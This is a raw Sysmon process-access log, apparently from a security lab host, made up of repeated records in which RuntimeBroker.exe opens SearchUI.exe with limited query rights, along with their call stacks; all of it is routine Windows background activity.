12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 